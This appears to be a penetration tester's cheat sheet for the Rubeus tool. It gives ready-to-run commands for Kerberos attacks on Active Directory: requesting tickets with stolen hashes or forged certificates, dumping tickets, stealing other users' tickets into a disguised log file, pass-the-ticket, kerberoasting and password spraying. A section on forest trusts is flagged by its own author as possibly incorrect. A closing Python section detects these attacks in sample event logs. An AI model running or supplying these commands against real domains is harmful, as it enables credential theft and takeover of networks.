# Rubeus.exe
Rubeus is wonderful for playing with hashes and Kerberos tickets.
# Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
TIP
Note: if doing asktgt for a domain controller, be sure to use the trailing dollar sign, i.e. DC01$
# Request a TGT with a pfx file (ESC1)
You'd do this, for example, after abusing ESC1 or ESC8 with certify.exe.
Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt
# Request a TGT with a pfx file (ESC8)
certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER
# Request a TGT when abusing forest trusts [ UNDER REVIEW ]
DANGER
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted domain SIDs with get-adobject and you've extracted trust keys with mimikatz, you can do something like this to request a TGT for the pwned domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap
# Dump tickets on a local machine
rubeus.exe dump /service:krbtgt /nowrap
# Monitor mode on a local machine
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
# Monitor mode - save to disk
If for some reason the TGTs won't write to registry, try this to write to disk:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log
# Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them:
reg export HKLM\SOFTWARE\MONITOR backup1.reg
TIP
Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.
# Describe a ticket
rubeus.exe describe /ticket:base64ticket
This came in real handy during an engagement where I had lifted a TGT from a system and was trying to pass it and use it, and was getting all sorts of errors. When I ran the describe command, the output said KeyType=180, which I learned means Credential Guard is in place and that ticket won't work anywhere else but the box it came from!
# Pass-the-ticket
rubeus.exe ptt /ticket:xxx
# Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
# Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
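As a defender-side companion to the asktgt /rc4, kerberoast and spray sections above, here is an added example (not from the original notes or the Rubeus project) that runs simple detection rules over constructed Windows Security events 4768, 4769 and 4771. The event records, field names and thresholds are assumptions for the demo; real pipelines would parse them out of EVTX/XML.

```python
from collections import defaultdict

RC4 = "0x17"  # Ticket Encryption Type for RC4-HMAC; 0x12 is AES256

# Constructed sample records (assumption: fields already parsed from 4768/4769/4771 events).
EVENTS = [
    {"id": 4768, "account": "alice", "etype": "0x12", "src": "10.0.0.5"},
    {"id": 4768, "account": "blah", "etype": RC4, "src": "10.0.0.99"},  # asktgt /rc4 pattern
    {"id": 4769, "account": "blah", "service": "svc_sql", "etype": RC4, "src": "10.0.0.99"},
    {"id": 4769, "account": "blah", "service": "svc_web", "etype": RC4, "src": "10.0.0.99"},
    {"id": 4769, "account": "alice", "service": "DC01$", "etype": "0x12", "src": "10.0.0.5"},
    {"id": 4771, "account": "u1", "status": "0x18", "src": "10.0.0.99"},
    {"id": 4771, "account": "u2", "status": "0x18", "src": "10.0.0.99"},
    {"id": 4771, "account": "u3", "status": "0x18", "src": "10.0.0.99"},
    {"id": 4771, "account": "alice", "status": "0x18", "src": "10.0.0.5"},  # one typo, not a spray
]

def rc4_tgt_requests(events):
    """4768 with an RC4 ticket: what asktgt /rc4:<hash> produces. In domains that issue
    AES TGTs to users this is the overpass-the-hash signal. Caveat: legacy clients
    and accounts restricted to RC4 will also fire, so baseline first."""
    return sorted({e["account"] for e in events if e["id"] == 4768 and e["etype"] == RC4})

def kerberoast_candidates(events, min_services=2):
    """4769 with RC4 tickets for non-machine service accounts, several distinct
    services from one requester: the shape `kerberoast` leaves in the log."""
    seen = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and the KDC itself are not roastable targets
        seen[(e["account"], e["src"])].add(svc)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_services}

def spray_sources(events, min_accounts=3):
    """4771 pre-auth failures with status 0x18 (bad password) against many distinct
    accounts from one client address: the footprint of `spray /password:...`."""
    hits = defaultdict(set)
    for e in events:
        if e["id"] == 4771 and e["status"] == "0x18":
            hits[e["src"]].add(e["account"])
    return {src: sorted(accts) for src, accts in hits.items() if len(accts) >= min_accounts}

if __name__ == "__main__":
    print("RC4 TGTs:", rc4_tgt_requests(EVENTS))
    print("Kerberoast:", kerberoast_candidates(EVENTS))
    print("Spray sources:", spray_sources(EVENTS))
```

Tune min_services and min_accounts to the environment; a single RC4 TGT or a handful of 4771s is noise in most domains, while the combination from one source address is worth a look.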